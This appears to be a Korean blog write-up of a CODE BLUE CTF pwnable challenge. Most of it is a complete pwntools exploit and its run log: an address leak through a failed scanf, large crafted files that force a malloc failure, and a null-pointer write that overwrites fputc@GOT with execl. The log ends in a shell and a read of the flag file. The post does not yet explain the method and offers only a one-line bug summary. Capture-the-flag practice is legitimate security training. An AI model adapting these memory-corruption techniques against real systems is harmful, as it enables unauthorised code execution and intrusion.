Category : pwnable
|
Summary : big file, malloc fail, ptr=malloc(size+1);ptr[size] = '\x00'; // ptr = 0, size = 0x0804~~~~
정말 오랜만에 first blood + 1solve ! 설명은 조만간 추가 예정
ex.py
#!/usr/bin/python
from pwn import *
import re
ssh_ = ssh(host = 'pwn2.task.ctf.codeblue.jp', password = 'lets_play' , user= 'game_chal')
ssh2_ = ssh(host = 'pwn2.task.ctf.codeblue.jp', password = 'lets_play' , user= 'game_chal')
s2 = ssh2_.process('/bin/sh', env={'PS1':''})
s2.sendline('cd /tmp/wwwwpp/')
s2.sendline('''ln -s setregid_sh `python -c 'print "\xb0\x1d\x1b"'`''')
while 1:
s = ssh_.process('/bin/sh', env={'PS1':''})
s.sendline('cd /tmp/wwwwpp/')
s.sendline('ulimit -c 1024')
s.sendline('/home/p11454/game')
# card game for memory leak
s.recvuntil('3. Exit')
s.sendline('2')
# scanf("%u %u", ...) failed
s.recvuntil('Input the coordinate of the 1st card to open\n')
s.sendline('a b')
s.recvuntil('Input the coordinate of the 2nd card to open\n')
stack, libc_base = map(int, re.findall('\((\d+), (\d+)\)', s.recvline().strip())[0])
#libc_base = libc_base - 0x1d0030
libc_base = libc_base - 0x1d6010
# last 2bytes of libc base must be 0xc000if (libc_base & 0xf000) != 0xc000:
s.close()
continue
execl_libc = libc_base + 0xB0A80
print 'libc_base :', hex(libc_base)
print 'execl@libc : ', hex(execl_libc)
s2.sendline('python create.py {}'.format(hex(execl_libc)))
s2.recvuntil('done')
# spray ...
for i in range(0, 20):
print i
s.recvuntil('3. Exit\n')
s.sendline('1')
s.recvuntil('Can you answer all the questions correctly?')
s.recvuntil('Q. ')
s.sendline('a')
s.recvuntil('Wrong.')
s.recvuntil('3. Exit\n')
s.sendline('1')
s.recvuntil('Can you answer all the questions correctly?')
for i in range(0, 5):
print i
s.recvuntil('Q. ')
s.sendline('u\x00')
s.recvuntil('Correct!')
print 'trigger!'
s.interactive()
create.py
#!/usr/bin/python
import sys
from struct import pack
p32 = lambda x : pack("<L", x)
if len(sys.argv) != 2:
exit(-1)
def create_sample(fname, data, length):
with open(fname, 'wb') as f:
i = length % 0x1000 if length % 0x1000 else 0x1000
f.write('a\nu\x00'+(data*((i-4)/len(data))))
while i < length:
f.write((data * (0x1000 / len(data))))
i += 0x1000
create_sample('youlose', 'a', 0x8000000)
create_sample('banner', 'a', 0x0804b069) # fputc@got
with open('flag', 'wb') as f:
f.write('hello\nbye\n')
value = int(sys.argv[1], 16)
for i in range(1, 11):
create_sample('quiz%02d' % i, p32(value), 0x8000000)
print 'done'
Exploit!
$ python ex.py
[+] Connecting to pwn2.task.ctf.codeblue.jp on port 22: Done
[!] Couldn't check security settings on 'pwn2.task.ctf.codeblue.jp'
[+] Connecting to pwn2.task.ctf.codeblue.jp on port 22: Done
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16527
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16533
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16533)
..........................
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16672
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16672)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16677
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16677)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16682
[*] Stopped remote process 'dash' on pwn2.task.ctf.codeblue.jp (pid 16682)
[+] Starting remote process '/bin/sh' on pwn2.task.ctf.codeblue.jp: pid 16687
libc_base : 0xf75fc000
execl@libc : 0xf76aca80
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
0
1
2
3
4
trigger!
[*] Switching to interactive mode
(null)Q. hello
> $
Wrong.
$ id
uid=33433(game_chal) gid=11454(p11454) groups=11454(p11454),33433(game_chal)
$ cat /home/p11454/actual_flag
CBCTF{Natural vulnerability in a miniature garden}
Flag : CBCTF{Natural vulnerability in a miniature garden}
'CTF > 2018' 카테고리의 다른 글
| SECCON 2017 QUAL - secure_keymanager (0) | 2018.08.22 |
|---|---|
| WhiteHat GrandPrix 2018 QUAL - pwn02 (BookStore) (0) | 2018.08.20 |
| WhiteHat GrandPrix 2018 QUAL - pwn01 (giftshop) (0) | 2018.08.19 |
| WhiteHat GrandPrix 2018 QUAL - web03 (0) | 2018.08.19 |
| CODEGATE 2018 Qual - 7amebox2 (1) | 2018.02.04 |
